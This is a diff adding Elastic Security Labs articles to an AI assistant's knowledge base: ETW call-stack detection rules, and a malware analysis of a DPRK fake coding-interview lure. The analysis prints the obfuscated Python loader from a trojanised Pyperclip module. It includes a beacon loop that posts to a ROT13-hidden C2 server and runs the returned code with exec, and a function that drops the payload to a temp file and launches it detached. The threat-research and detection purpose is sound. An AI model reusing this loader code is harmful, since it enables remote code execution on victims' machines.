+Microsoft has identified a handful of highly security-relevant syscalls and provided security vendors with near real-time telemetry of those. While we would strongly prefer inline callbacks that allow synchronous blocking of malicious activity, Microsoft has implicitly not deemed this a necessary security use case yet. Currently, the only filtering mechanism afforded to security vendors for these syscalls is user-mode hooking - and that approach is [inherently](https://blogs.blackberry.com/en/2017/02/universal-unhooking-blinding-security-software) [fragile](https://www.cyberbit.com/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/). At Elastic, we determined that a more robust detection approach based on kernel telemetry collected through ETW would provide greater security benefits than easily bypassed user-mode hooks. That said, kernel ETW does have some [systemic issues](https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs) that we have logged with Microsoft, along with suggested [mitigations](https://www.elastic.co/security-labs/finding-truth-in-the-shadows).
+
+## Implementation
+
+Endpoint telemetry is a careful balance between completeness and cost. Vendors don’t want to balloon your SIEM storage costs unnecessarily, but they also don't want you to miss the critical indicator of compromise. To reduce event volumes for these new API events, we fingerprint each event and only emit it if it is unique. This deduplication ensures a minimal impact on detection fidelity.
+
+However, this approach proved insufficient in reducing API event volumes to manageable levels in all environments. Any further global reduction of event volumes we introduced would be a blindspot for our customers. Instead of potentially impairing detection visibility in this fashion, we determined that these highly verbose events would be processed for detections on the host but would not be streamed to the SIEM by default. This approach reduces storage costs for most of our users while also empowering any customer SOCs that want the full fidelity of those events to opt into streaming via an advanced option available in Endpoint policy and implement filtering tailored to their specific environments.
+
+Currently, we propagate visibility into the following APIs -
+
+ - `VirtualAlloc`
+ - `VirtualProtect`
+ - `MapViewOfFile`
+ - `VirtualAllocEx`
+ - `VirtualProtectEx`
+ - `MapViewOfFile2`
+ - `QueueUserAPC` [call stacks not always available due to ETW limitations]
+ - `SetThreadContext` [call stacks planned for 8.12]
+ - `WriteProcessMemory`
+ - `ReadProcessMemory` (lsass) [planned for 8.12]
+
+In addition to call stack information, our API events are also enriched with several [behaviors](https://github.com/elastic/endpoint-package/blob/main/custom_schemas/custom_api.yml):
+
+| API event | Description |
+|-----|-----|
+| `cross-process` | The observed activity was between two processes. |
+| `native_api` | A call was made directly to the undocumented Native API rather than the supported Win32 API. |
+| `direct_syscall` | A syscall instruction originated outside of the Native API layer. |
+| `proxy_call` | The call stack appears to show a proxied API call to masking the true caller. |
+| `sensitive_api` | Executable non-image memory is unexpectedly calling a sensitive API. |
+| `shellcode` | Suspicious executable non-image memory is calling a sensitive API. |
+| `image-hooked` | An entry in the call stack appears to have been hooked. |
+| `image_indirect_call` | An entry in the call stack was preceded by a call to a dynamically resolved function. |
+| `image_rop` | An entry in the call stack was not preceded by a call instruction. |
+| `image_rwx` | An entry in the call stack is writable. |
+| `unbacked_rwx` | An entry in the call stack is non-image and writable. |
+| `allocate_shellcode` | A region of non-image executable memory suspiciously allocated more executable memory. |
+|`execute_fluctuation` | The PAGE_EXECUTE protection is unexpectedly fluctuating. |
+| `write_fluctuation` | The PAGE_WRITE protection of executable memory is unexpectedly fluctuating. |
+| `hook_api` | A change to the memory protection of a small executable image memory region was made. |
+| `hollow_image` | A change to the memory protection of a large executable image memory region was made. |
+| `hook_unbacked` | A change to the memory protection of a small executable non-image memory was made. |
+| `hollow_unbacked` | A change to the memory protection of a large executable non-image memory was made. |
+| `guarded_code` | Executable memory was unexpectedly marked as PAGE_GUARD.
+| `hidden_code` | Executable memory was unexpectedly marked as PAGE_NOACCESS.
+| `execute_shellcode` | A region of non-image executable memory was executed in an unexpected fashion. |
+| `hardware_breakpoint_set` | A hardware breakpoint was potentially set. |
+
+## New Rules
+
+In 8.11, Elastic Defend’s behavior protection comes with many new rules against various popular malware techniques, such as shellcode fluctuation, threadless injection, direct syscalls, indirect calls, and AMSI or ETW patching.  
+
+These rules include:
+
+### Windows API Call via Direct Syscall
+
+Identifies the call of commonly abused Windows APIs to perform code injection and where the call stack is not starting with NTDLL: 
+
+```
+api where event.category == "intrusion_detection" and
+
+    process.Ext.api.behaviors == "direct_syscall" and 
+
+    process.Ext.api.name : ("VirtualAlloc*", "VirtualProtect*", 
+                             "MapViewOfFile*", "WriteProcessMemory")
+```
+
+![Windows API Call via Direct Syscall rule logic](/assets/images/doubling-down-etw-callstacks/image1.png)
+
+### VirtualProtect via Random Indirect Syscall
+
+Identifies calls to the VirtualProtect API and where the call stack is not originating from its equivalent NT syscall NtProtectVirtualMemory:
+
+```
+api where 
+
+ process.Ext.api.name : "VirtualProtect*" and 
+
+ not _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info: ("*ntdll.dll!NtProtectVirtualMemory*", "*ntdll.dll!ZwProtectVirtualMemory*")) 
+```
+
+![VirtualProtect via Random Indirect Syscall rule match examples](/assets/images/doubling-down-etw-callstacks/image5.png)
+
+### Image Hollow from Unbacked Memory
+
+```
+api where process.Ext.api.behaviors == "hollow_image" and 
+
+  process.Ext.api.name : "VirtualProtect*" and 
+
+  process.Ext.api.summary : "*.dll*" and 
+
+  process.Ext.api.parameters.size >= 10000 and process.executable != null and 
+
+  process.thread.Ext.call_stack_summary : "*Unbacked*"
+```
+
+Below example of matches on `wwanmm.dll` module stomping to replace it’s memory content with a malicious payload: 
+
+![Image Hollow from Unbacked Memory rule match examples](/assets/images/doubling-down-etw-callstacks/image2.png)
+
+### AMSI and WLDP Memory Patching
+
+Identifies attempts to modify the permissions or write to Microsoft Antimalware Scan Interface or the Windows Lock Down Policy related DLLs from memory to modify its behavior for evading malicious content checks: 
+
+```
+api where
+
+ (
+  (process.Ext.api.name : "VirtualProtect*" and 
+    process.Ext.api.parameters.protection : "*W*") or
+
+  process.Ext.api.name : "WriteProcessMemory*"
+  ) and
+
+ process.Ext.api.summary : ("* amsi.dll*", "* mpoav.dll*", "* wldp.dll*") 
+```
+
+![AMSI and WLDP Memory Patching rule match examples](/assets/images/doubling-down-etw-callstacks/image6.png)
+
+### Evasion via Event Tracing for Windows Patching
+
+Identifies attempts to patch the Microsoft Event Tracing for Windows via memory modification: 
+
+```
+api where process.Ext.api.name :  "WriteProcessMemory*" and 
+
+process.Ext.api.summary : ("*ntdll.dll!Etw*", "*ntdll.dll!NtTrace*") and 
+
+not process.executable : ("?:\\Windows\\System32\\lsass.exe", "\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe")
+```
+
+![Evasion via Event Tracing for Windows Patching rule match examples](/assets/images/doubling-down-etw-callstacks/image4.png)
+
+### Windows System Module Remote Hooking
+
+Identifies attempts to write to a remote process memory to modify NTDLL or Kernelbase modules as a preparation step for stealthy code injection:
+
+```
+api where process.Ext.api.name : "WriteProcessMemory" and  
+
+process.Ext.api.behaviors == "cross-process" and 
+
+process.Ext.api.summary : ("*ntdll.dll*", "*kernelbase.dll*")
+```
+
+Below is an example of matches on [ThreadLessInject](https://github.com/CCob/ThreadlessInject), a new process injection technique that involves hooking an export function from a remote process to gain shellcode execution (avoiding the creation of a remote thread):
+
+![ThreadlessInject example detecting via the Windows System Module Remote Hooking rule](/assets/images/doubling-down-etw-callstacks/image3.png)
+
+## Conclusion
+
+Until Microsoft provides vendors with kernel callbacks for security-relevant syscalls, Threat-Intelligence ETW will remain the most robust visibility into in-memory threats on Windows. At Elastic, we’re committed to putting that visibility to work for customers and optionally directly into their hands without any hidden filtering assumptions. 
+
+[Stay tuned](https://www.elastic.co/guide/en/security/current/release-notes.html) for the call stack features in upcoming releases of Elastic Security. 
+
+## Resources
+
+### Rules released with 8.11:
+
+ - [AMSI or WLDP Bypass via Memory Patching](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_amsi_or_wldp_bypass_via_memory_patching.toml)     
+ - [Call Stack Spoofing via Synthetic Frames](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_call_stack_spoofing_via_synthetic_frames.toml)
+ - [Evasion via Event Tracing for Windows Patching](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_evasion_via_event_tracing_for_windows_patching.toml)
+ - [Memory Protection Modification of an Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_memory_protection_modification_of_an_unsigned_dll.toml)
+ - [Network Activity from a Stomped Module](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_network_activity_from_a_stomped_module.toml)
+ - [Potential Evasion via Invalid Code Signature](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_evasion_via_invalid_code_signature.toml)
+ - [Potential Injection via an Exception Handler](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_injection_via_an_exception_handler.toml)
+ - [Potential Injection via Asynchronous Procedure Call](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_injection_via_asynchronous_procedure_call.toml)
+ - [Potential Thread Call Stack Spoofing](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_potential_thread_call_stack_spoofing.toml)
+ - [Remote Process Injection via Mapping](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_process_injection_via_mapping.toml)
+ - [Remote Process Manipulation by Suspicious Process](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_process_manipulation_by_suspicious_process.toml)
+ - [Remote Thread Context Manipulation](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_remote_thread_context_manipulation.toml)
+ - [Suspicious Activity from a Control Panel Applet](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_activity_from_a_control_panel_applet.toml)
+ - [Suspicious API Call from a Script Interpreter](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_api_call_from_a_script_interpreter.toml)
+ - [Suspicious API from an Unsigned Service DLL](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/persistence_suspicious_api_from_an_unsigned_service_dll.toml)
+ - [Suspicious Call Stack Trailing Bytes](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_call_stack_trailing_bytes.toml)
+ - [Suspicious Executable Heap Allocation](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_executable_heap_allocation.toml)
+ - [Suspicious Executable Memory Permission Modification](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_executable_memory_permission_modification.toml)
+ - [Suspicious Memory Protection Fluctuation](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_memory_protection_fluctuation.toml)
+ - [Suspicious Memory Write to a Remote Process](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_memory_write_to_a_remote_process.toml)
+ - [Suspicious NTDLL Memory Write](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_ntdll_memory_write.toml) 
+ - [Suspicious Null Terminated Call Stack](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_null_terminated_call_stack.toml)
+ - [Suspicious Kernel32 Memory Protection](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_kernel32_memory_protection.toml)
+ - [Suspicious Remote Memory Allocation](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_remote_memory_allocation.toml)
+ - [Suspicious Windows API Call from Virtual Disk or USB](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_from_virtual_disk_or_usb.toml)
+ - [Suspicious Windows API Call via Direct Syscall](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_via_direct_syscall.toml)
+ - [Suspicious Windows API Call via ROP Gadgets](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_call_via_rop_gadgets.toml)
+ - [Suspicious Windows API Proxy Call](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_suspicious_windows_api_proxy_call.toml)
+ - [VirtualProtect API Call from an Unsigned DLL](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_api_call_from_an_unsigned_dll.toml)
+ - [VirtualProtect Call via NtTestAlert](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_call_via_nttestalert.toml)
+ - [VirtualProtect via Indirect Random Syscall](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_via_indirect_random_syscall.toml)
+ - [VirtualProtect via ROP Gadgets](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_virtualprotect_via_rop_gadgets.toml)
+ - [Windows API via a CallBack Function](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_windows_api_via_a_callback_function.toml) 
+ - [Windows System Module Remote Hooking](https://github.com/elastic/protections-artifacts/blob/cb45629514acefc68a9d08111b3a76bc90e52238/behavior/rules/defense_evasion_windows_system_module_remote_hooking.toml)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dprk_code_of_conduct.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dprk_code_of_conduct.md
new file mode 100644
index 0000000000000..923984ca79fbf
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dprk_code_of_conduct.md
@@ -0,0 +1,378 @@
+---
+title: "Code of Conduct: DPRK’s Python-fueled intrusions into secured networks"
+slug: "dprk-code-of-conduct"
+date: "2024-09-18"
+description: "Investigating the DPRK’s strategic use of Python and carefully crafted social engineering, this publication sheds light on how they breach highly secure networks with evolving and effective cyber attacks."
+author:
+  - slug: colson-wilhoit
+image: "dprk-code-of-conduct.jpg"
+category:
+  - slug: malware-analysis
+  - slug: attack-pattern
+  - slug: security-research
+tags:
+  - python
+  - dprk
+---
+
+## Preamble
+
+Few threat actors have garnered as much attention and notoriety in the shadowy world of state-sponsored cyber operations as the Democratic People's Republic of Korea (DPRK). DPRK-affiliated threat groups have consistently demonstrated their use of social engineering tactics coupled with tactical capabilities. At the forefront of their arsenal lies an unexpected weapon: Python.
+
+This versatile programming language, prized for its accessibility and power, has become the tool for DPRK operatives seeking initial access to target systems. These threat actors have successfully penetrated some of the world's most secure networks through a potent combination of meticulously crafted social engineering schemes and elegantly disguised Python code.
+
+This publication will examine the DPRK's use of social engineering and Python-based lures for initial access. Building on [research published](https://www.reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages) by the Reversing Labs team for the campaign they call VMConnect, we'll explore a very recent real-world example, dissect the code, and examine what makes these attacks so effective. By understanding these techniques, we aim to shed light on the evolving landscape of state-sponsored cyber threats and equip defenders with the knowledge to combat them.
+
+## Key takeaways
+
+* The sophistication of DPRK's social engineering tactics often involves long-term persona development and targeted narratives.
+* The use of Python for its ease of obfuscation, extensive library support, and ability to blend with legitimate system activities.
+* These lures evidence the ongoing evolution of DPRK's techniques, which highlights the need for continuous vigilance and adaptation in cyber defense strategies.
+* The Python script from this campaign includes modules that allow for the execution of system commands and to write and execute local files
+
+## RookeryCapital_PythonTest.zip 
+
+This sample is distributed under the guise of a Python coding challenge for a “Capital One” job interview. It contains a known Python module that appears innocent on the surface. This module includes standard clipboard management functionality but also harbors obfuscated code capable of exfiltrating data and executing arbitrary commands.
+
+Using encoding techniques like Base64 and ROT13, the attacker camouflaged dangerous functionality to evade detection by both human reviewers and automated security scans. The code reaches out to a remote server, downloading and executing commands under the guise of clipboard operations. It is a perfect example of how easily malicious functionality can be masked in standard code.
+
+We'll analyze this Python application line by line, uncovering how it:
+
+* Establishes a connection to a malicious server
+* Executes hidden commands via remote code execution (RCE)
+* Uses common obfuscation techniques to fly under the radar
+* Embeds persistent retry mechanisms to ensure successful communication
+
+![DPRK Python initial access execution flow](/assets/images/dprk-code-of-conduct/image5.png "DPRK Python initial access execution flow")
+
+### PasswordManager.py
+
+This “Python Challenge” is provided via a `.zip` file containing a Python application called “PasswordManager”. This application primarily consists of a main script, `PasswordManager.py`, and two Python modules, `Pyperclip` and `Pyrebase`. 
+
+![PasswordManager Application Contents](/assets/images/dprk-code-of-conduct/image1.png "PasswordManager Application Contents")
+
+Examining the `README.md` file first, it is evident that this is meant to be some sort of interview challenge or assessment, but what immediately piqued our interest were the following lines:
+
+![Excerpt from “PasswordManager” application README file](/assets/images/dprk-code-of-conduct/image4.png "Excerpt from “PasswordManager” application README file")
+
+This was interesting as they wanted to ensure that the application was run before the user made any changes that may cause certain functionality to break or become noticeable.
+
+The main `PasswordManager.py` file looks like the makings of a basic Python password manager application. Of course, as we noted above, the application imports two third-party modules (`Pyperclip` and `Pyrebase`) into this main script. 
+
+#### Pyperclip module
+
+The `Pyperclip` module has two files, `__init__.py` and `__main__.py`.
+
+![Pyperclip module files ](/assets/images/dprk-code-of-conduct/image2.png "Pyperclip module files ")
+
+In Python, modules often consist of multiple files, with two important ones being `__init__.py` and `__main__.py`. The `__init__.py`  file initializes a Python package, allowing it to function when imported, while the `__main__.py` file allows the module to be run as a standalone program. 
+
+##### __init__.py
+
+`__init__.py` is the first module to be imported and primarily facilitates clipboard operations on various platforms (Windows, macOS, Linux, etc.). The bulk of this code is designed to detect the platform (Windows, Linux, macOS) and provide the appropriate clipboard handling functions (copy, paste), relying on native utilities (e.g., `pbcopy` for macOS, `xclip` for Linux) or Python libraries (e.g., gtk, PyQt4/PyQt5). 
+
+The imports reveal potentially interesting or suspicious functionality from libraries such as `base64`, `codecs`, `subprocess`, and `tempfile`. The `base64` module provides encoding or decoding capabilities, which can be used to hide or obfuscate sensitive information. When paired with `codecs`, another module often used for encoding or decoding text (in this case, using the ROT13 cipher), it becomes clear that the script is manipulating data to evade detection.
+
+The presence of the `subprocess` module is particularly concerning. This module allows the script to run system commands, opening the door for executing arbitrary code on the machine. This module can execute external scripts, launch processes, or install malicious binaries.
+
+The inclusion of the `tempfile module` is also noteworthy. This module creates temporary files that can be written to and executed, a common technique malware uses to hide its tracks. This module suggests the script may be writing content to disk and executing it within a temporary directory.
+
+```
+import contextlib
+import ctypes
+import os
+import platform
+import subprocess
+import sys
+import time
+import warnings
+import requests
+import datetime
+import platform
+import codecs
+import base64
+import tempfile
+import subprocess
+import os
+```
+
+**__init__.py imports**
+
+Analyzing the script a large base64 encoded blob assigned to the variable `req_self` quickly stands out. 
+
+```
+req_self = "aW1wb3J0IHN0….Y29udGludWUNCg=="
+```
+
+Decoding this Base64 encoded string reveals an entirely new and self-contained Python script with some very interesting code. 
+
+##### Obfuscated Python Script
+
+The script imports several standard libraries (e.g., `requests`, `random`, `platform`), allowing it to generate random data, interact with the operating system, encode/decode strings, and make network requests.
+
+```
+import string
+import random
+import requests
+import platform
+from time import sleep
+import base64
+import os
+import codecs
+```
+
+**Encoded Python script imports**
+
+The script contains two functions named `co` and `rand_n`. 
+
+The `co` function operates as a helper function. This function checks the current operating system (`osn`). It uses the `codecs.decode` function with ROT13 encoding to decode the string `Jvaqbjf`, which results in `Windows`. If the operating system is Windows, it returns `0`; otherwise, it returns `1`.
+
+```
+def co(osn):
+  if osn == codecs.decode('Jvaqbjf', 'rot13'):
+      return 0
+  else:
+      return 1
+```
+
+**`co` function within encoded Python script**
+
+Decoding ROT13 can easily be done on the macOS or Linux CLI or with the [ROT13 CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,13)&input=SnZhcWJqZg&oeol=CRLF).
+
+```
+$ echo "Jvaqbjf" | tr '[A-Za-z]' '[N-ZA-Mn-za-m]'
+Windows
+```
+
+The `rand_n` function generates an 8-digit pseudorandom number from the string `123456789`. This is likely used as an identifier (`uid`) in further communication with the remote server.
+
+```
+def rand_n():
+  _LENGTH = 8
+  str_pool = "123456789"
+  result = ""
+  for i in range(_LENGTH):
+      result += random.choice(str_pool)
+  return result
+```
+
+**`rand_n` function within encoded Python script**
+
+Following the function declarations, the script defines a set of variables with hardcoded values it will use.
+
+```
+uid = rand_n()
+f_run = ""
+oi = platform.system()
+url = codecs.decode('uggcf://nxnznvgrpuabybtvrf.bayvar/', 'rot13')
+headers = {"Content-Type": "application/json; charset=utf-8"}
+data = codecs.decode('Nznmba.pbz', 'rot13') + uid + "pfrr" + str(co(oi))
+```
+
+**Encoded Python script variables**
+
+* `uid`: Random identifier generated using `rand_n()`
+* `oi`: The operating system platform
+* `url`: After decoding using ROT13, this resolves to a URL for a malicious server ([https://akamaitechnologies[.]online](https://akamaitechnologies[.]online)). The threat actor is obviously attempting to evade detection by encoding the URL and disguising it as a seemingly legitimate service (Akamai), which is a known CDN provider.
+* `data`: This is the data payload being sent to the server. It includes a decoded string (`Amazon[.]com`), the random uid, and the result of `co(oi)` which checks if the OS is Windows.
+
+The last part of the script is the main while loop. 
+
+```
+while True:
+  try:
+      response = requests.post(url, headers=headers, data=data)
+      if response.status_code != 200:
+          sleep(60)
+          continue
+      else:
+          res_str = response.text
+          if res_str.startswith(codecs.decode('Tbbtyr.pbz', 'rot13')) and len(response.text) > 15:
+              res = response.text
+              borg = res[10:]
+              dec_res = base64.b64decode(borg).decode('utf-8')
+
+              globals()['pu_1'] = uid
+              globals()['pu_2'] = url
+              exec(compile(dec_res, '', 'exec'), globals())
+              sleep(1)
+              break
+          else:
+              sleep(20)
+              pass
+
+  except:
+      sleep(60)
+      continue
+```
+
+**Encoded Python script main while loop**
+
+The first try block sends an HTTP POST request to the malicious server (url) with the headers and data. If the server responds with a status code other than 200 OK, the script waits 60 seconds and retries.
+
+Else, if the response starts with the decoded string 'Google.com' and the response length is greater than 15, it extracts a base64-encoded portion of the response. It then decodes this portion and executes the decoded script using `exec(compile(dec_res, '', 'exec'), globals())`. This allows the attacker to send arbitrary Python code to be executed on the victim's machine.
+
+Towards the end of the loop it sets global variables with the random uid and the URL used in communication with the remote server. This is used later when executing the downloaded payload.
+
+Now that we understand the purpose of the encoded Python script let's go back to the `__inity__.py` script and break down the function that executes the base64-encoded section. 
+
+##### __inity__.py
+
+Back within the `__inity__.py` script we can look for any other reference to the `req_self` variable to see what the script does with that encoded Python script. We find one single reference located in a function defined as `cert_acc`. 
+
+```
+def cert_acc():
+  ct_type = platform.system()
+  l_p = tempfile.gettempdir()
+
+  if ct_type == codecs.decode("Jvaqbjf", stream_method):
+      l_p = l_p + codecs.decode('\\eronfr.gzc', stream_method)
+      header_ops = codecs.decode(push_opr, stream_method) + l_p
+  else:
+      l_p = l_p + codecs.decode('/eronfr.gzc', stream_method)
+      header_ops = codecs.decode(push_ops, stream_method) + l_p
+
+  request_query = open(l_p, 'w')
+  request_object = base64.b64decode(req_self)
+  request_query.write(request_object.decode('utf-8'))
+  request_query.close()
+  try:
+      if ct_type == codecs.decode("Jvaqbjf", stream_method):
+          subprocess.Popen(header_ops, creationflags=subprocess.DETACHED_PROCESS)
+      else:
+          subprocess.Popen(header_ops, shell=True, preexec_fn=os.setpgrp)
+  except:
+      pass
+cert_acc()
+```
+
+```
+ct_type = platform.system()
+```
+
+This variable retrieves the current operating system type (e.g., Windows, Linux, Darwin for macOS) using the `platform.system()` function. The value is stored in the `ct_type` variable.
+
+```
+l_p = tempfile.gettempdir()
+```
+
+This variable calls the `tempfile.gettempdir() function`, which returns the path to the system's temporary directory. This directory is commonly used for storing temporary files that the system or programs create and then delete upon reboot. The value is assigned to `l_p`.
+
+The `if-else` block takes advantage of the codecs library decode function using ROT13 to decode the string `Jvaqbjf`, which translates to `Windows`. This checks if the system type is Windows. If the system is Windows, the code appends a ROT13-decoded string (which turns out to be `\eronfr.gzc`, `\rebase.tmp` after decoding) to the temporary directory path `l_p`. It then constructs a command `header_ops`, which likely combines the decoded `push_opr` variable (also using ROT13) with the path.
+
+If the system is not Windows, it appends a Unix-like file path `/eronfr.gzc` (`/rebase.tmp` after decoding) and similarly constructs a command using `push_ops`. This part of the code is designed to run different payloads or commands depending on the operating system.
+
+```
+if ct_type == codecs.decode("Jvaqbjf", stream_method):
+      l_p = l_p + codecs.decode('\\eronfr.gzc', stream_method)
+      header_ops = codecs.decode(push_opr, stream_method) + l_p
+  else:
+      l_p = l_p + codecs.decode('/eronfr.gzc', stream_method)
+      header_ops = codecs.decode(push_ops, stream_method) + l_p
+```
+
+The next several statements, starting with `request_`, serve to write the Base64-encoded Python script we have already analyzed to` disk in the temporary directory. This code opens a new file in the temporary directory (`l_p`), which was previously set depending on the system type. The variable `req_self` (also a Base64-encoded string) is decoded into its original form. The decoded content is written into the file, and the file is closed.
+
+```
+request_query = open(l_p, 'w')
+  request_object = base64.b64decode(req_self)
+  request_query.write(request_object.decode('utf-8'))
+  request_query.close()
+```
+
+The function's final `try` block facilitates the execution of the encoded Python script.
+
+If the system type is Windows, the code attempts to execute the file (constructed in `header_ops`) using the `subprocess.Popen function`. The `DETACHED_PROCESS` flag ensures that the process runs independently of the parent process, making it harder to track.
+
+If the system is not Windows, it runs the file using a different execution method (`subprocess.Popen` with `shell=True`), which is more common for Unix-like systems (Linux/macOS). The `preexec_fn=os.setpgrp` makes the process immune to terminal interrupts, allowing it to run in the background.
+
+```
+try:
+      if ct_type == codecs.decode("Jvaqbjf", stream_method):
+          subprocess.Popen(header_ops, creationflags=subprocess.DETACHED_PROCESS)
+      else:
+          subprocess.Popen(header_ops, shell=True, preexec_fn=os.setpgrp)
+  except:
+      pass
+```
+
+The `cert_acc` function executes the obfuscated Python script, which retrieves commands to be executed within the cert_acc function.
+
+The script within the `Pyperclip` package exhibits clear signs of malicious behavior, using obfuscation techniques like ROT13 and Base64 encoding to hide its true intent. It identifies the operating system and adapts its actions accordingly, writing to disk and executing an obfuscated Python script in the system’s temporary directory. The script establishes communication with a remote server, enabling remote code execution (RCE) and allowing the attacker to send further commands. This carefully concealed process ensures the script runs stealthily, avoiding detection while maintaining effective C2 (Command and Control) over the infected machine. 
+
+#### Campaign intersections
+
+When we found this sample, we also came across additional samples that matched its code implementation and previous campaign lures we have observed in the wild. 
+
+This lure again masquerades as a Python coding challenge delivered under the guise of a job interview. Its Python code implementation matches exactly the code we’ve analyzed above, and based on description and filename, it matches the lure described by Mandiant as “[CovertCatch](https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists).”
+
+The next lure is different from the previous ones but matches the Python code implementation we have seen and written about previously. Last year, we brought to light the malware known as “[KandyKorn](https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn)” that targeted CryptoCurrency developers and engineers.
+
+## Detection, Hunting and Mitigation Strategies 
+
+Detecting and mitigating this type of obfuscated malicious code and its behavior requires a combination of proactive security measures, monitoring, and user awareness. 
+
+The best mitigation strategy against these lures and initial access campaigns is to educate your users regarding the extensive, targeted methods threat actors, like the DPRK, employ to gain code execution. Knowledge regarding these campaigns and being able to recognize them combined with a strong emphasis on proper code analysis before execution, especially when it comes to 3rd party applications like this, from “recruiters”, “developer forums”, “Github”, etc., will provide a strong foundation of defense against these attacks. 
+
+Regarding this sample specifically, there are a few different detections we can write surrounding the behavior of the code execution mechanism and the potential resulting use cases associated with that activity. While these queries are macOS-specific, you can take them and alter them to detect the same activity on Windows as well. 
+
+### [Detection] Python Subprocess Shell Tempfile Execution and Remote Network Connection
+
+```
+sequence by process.parent.entity_id with maxspan=3s
+[process where event.type == "start" and event.action == "exec" and process.parent.name : "python*"
+ and process.name : ("sh", "zsh", "bash") and process.args == "-c" and process.args : "python*"]
+[network where event.type == "start"]
+```
+
+![Sequence based Behavior Rule detection](/assets/images/dprk-code-of-conduct/image3.png "Sequence based Behavior Rule detection")
+
+This rule looks for the specific behavior exhibited when the `__init__.py` sample writes the obfuscated Python script to disk and utilizes the `subprocess.Popen` method, setting the shell variable equal to True to execute the Python script that connects to a remote server to retrieve and execute commands. 
+
+### [Hunt] Python Executable File Creation in Temporary Directory
+
+```
+file where event.type == "modification" and file.Ext.header_bytes : ("cffaedfe*", "cafebabe*")
+ and (process.name : "python*" or Effective_process.name : "python*") and file.path : ("/private/tmp/*", "/tmp/*")
+```
+
+If the threat actor attempts to use this functionality to download an executable payload within the temporary directory already specified in the script, we could use this rule to look for the creation of an executable file in a temporary directory via Python. 
+
+### [Hunt] Interactive Shell Execution via Python
+
+```
+process where host.os.type == "macos" and event.type == "start" and event.action == "exec" 
+and process.parent.name : "python*" and process.name : ("sh", "zsh", "bash")
+ and process.args == "-i" and process.args_count == 2
+```
+
